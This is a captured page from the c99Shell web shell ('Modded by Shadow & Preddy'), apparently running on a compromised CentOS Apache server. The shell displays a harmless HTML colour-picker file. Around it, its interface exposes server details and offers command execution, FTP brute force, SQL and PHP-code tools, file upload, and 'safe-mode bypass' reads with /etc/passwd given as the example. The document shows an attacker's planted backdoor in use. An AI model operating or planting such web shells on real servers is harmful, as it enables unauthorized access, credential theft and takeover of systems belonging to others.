!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/editor/   drwxr-xr-x
Free 52.63 GB of 127.8 GB (41.18%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     colorcodes.html (4.49 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0039)http://www.gifart.com/color-codes.shtml -->
<HTML><HEAD><TITLE>HTML Color Codes!</TITLE>
<META http-equiv=Content-Type content="text/html; charset=windows-874">
<META content="HTML, color codes, hex values, colors, code" name=keywords>
<META content="Robert Gillen - rob@gifart.com" name=author>
<META content="Color codes for your Web pages." name=DESCRIPTION>
<SCRIPT language=JavaScript>
<!-- Original:  D10n (biab@iinet.net.au) -->
<!-- Web Site:  http://www.iinet.net.au/~biab -->

<!-- This script and many more are available free online at -->
<!-- The JavaScript Source!! http://javascript.internet.com -->

<!-- Begin
addary = new Array();           //red
addary[0] = new Array(0,1,0);   //red green
addary[1] = new Array(-1,0,0);  //green
addary[2] = new Array(0,0,1);   //green blue
addary[3] = new Array(0,-1,0);  //blue
addary[4] = new Array(1,0,0);   //red blue
addary[5] = new Array(0,0,-1);  //red
addary[6] = new Array(255,1,1);
clrary = new Array(360);
for(i = 0; i < 6; i++)
for(j = 0; j < 60; j++) {
clrary[60 * i + j] = new Array(3);
for(k = 0; k < 3; k++) {
clrary[60 * i + j][k] = addary[6][k];
addary[6][k] += (addary[i][k] * 4);
   }
}
function capture() {
if(document.layers) {
layobj = document.layers['wheel'];
layobj.document.captureEvents(Event.MOUSEMOVE);
layobj.document.onmousemove = moved;
}
else {
layobj = document.all["wheel"];
layobj.onmousemove = moved;
   }
}
function moved(e) {
y = 4 * ((document.layers)?e.layerX:event.offsetX);
x = 4 * ((document.layers)?e.layerY:event.offsetY);
sx = x - 512;
sy = y - 512;
qx = (sx < 0)?0:1;
qy = (sy < 0)?0:1;
q = 2 * qy + qx;
quad = new Array(-180,360,180,0);
xa = Math.abs(sx);
ya = Math.abs(sy);
d = ya * 45 / xa;
if(ya > xa) d = 90 - (xa * 45 / ya);
deg = Math.floor(Math.abs(quad[q] - d));
n = 0;
sx = Math.abs(x - 512);
sy = Math.abs(y - 512);
r = Math.sqrt((sx * sx) + (sy * sy));
if(x == 512 & y == 512) {
c = "000000";
}
else {
for(i = 0; i < 3; i++) {
r2 = clrary[deg][i] * r / 256;
if(r > 256) r2 += Math.floor(r - 256);
if(r2 > 255) r2 = 255;
n = 256 * n + Math.floor(r2);
}
c = n.toString(16);
while(c.length < 6) c = "0" + c;
}
if(document.layers) {
document.layers["wheel"].document.f.t.value = "#" + c;
document.layers["wheel"].bgColor = "#" + c;
}
else {
document.all["wheel"].document.f.t.value = "#" + c;
document.all["wheel"].style.backgroundColor = "#" + c;
}
return false;
}
function colorcode() {
   document.f.colorcode.value =  document.f.t.value;
  }

//  End -->
</SCRIPT>

<META content="MSHTML 6.00.2600.0" name=GENERATOR></HEAD>
<BODY text=#000000 vLink=#000080 aLink=#ff0000 link=#0000ff bgColor=#FFFFFF 
leftMargin=0 topMargin=0 onload=capture() marginheight="0" marginwidth="0">
<DIV align=center>
<TABLE width=400 height="400" border=0 cellPadding=0 cellSpacing=0>
  <TBODY>
  <TR>
    <TD width=700 bgColor=#ffffff>
      <DIV align=right><FONT face="Verdana, Helvetica" size=-1></FONT></DIV>
          
          <div align="center">StartUp Design&amp; Network<BR>
            <FONT face="verdana, Arial" size=1><BIG><STRONG>HTML Color Codes.</STRONG></BIG></FONT><BR>
            <FONT face="arial, helvetica" 
      color=#003399 size=2>Use this tool to find the color you may need to build 
            your Web pages.<BR>
            </FONT> </div>
          <DIV id=wheel>
      <TABLE width=400 border=0 align="center" cellPadding=0 cellSpacing=0>
        <TBODY>
        <TR>
                  <TD> 
				  <!-- Start Middle Code -->
				  <div align="center"><IMG 
            src="image/colorwheel.jpeg" alt="คลิกเพื่อส่งสีไป Box color" width=256 height=256 
          border=0 onClick="colorcode();"></div></TD></TR>
        <TR>
          <TD align=middle>
                  </TD>
                </TR></TBODY></TABLE></DIV>
          <!-- Script Size:  3.15 KB -->
          <FORM name=f>
            <div align="center">
              <INPUT size=27 name=t  type="hidden">
              &nbsp;&nbsp;You can copy code in Boxcolor or click ตกลง<br>
              &nbsp;&nbsp;Box color 
              <input name="colorcode" type="text" id="colorcode">
              <input type="button" name="Button" value=" ตกลง " onClick="window.opener.document.detail_menu.color_title.value=document.f.colorcode.value; window.close();">
              <br>
            </div>
          </FORM> 
        </TD>
   </TR>
  </TBODY></TABLE>
</DIV>
</BODY></HTML>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0055 ]--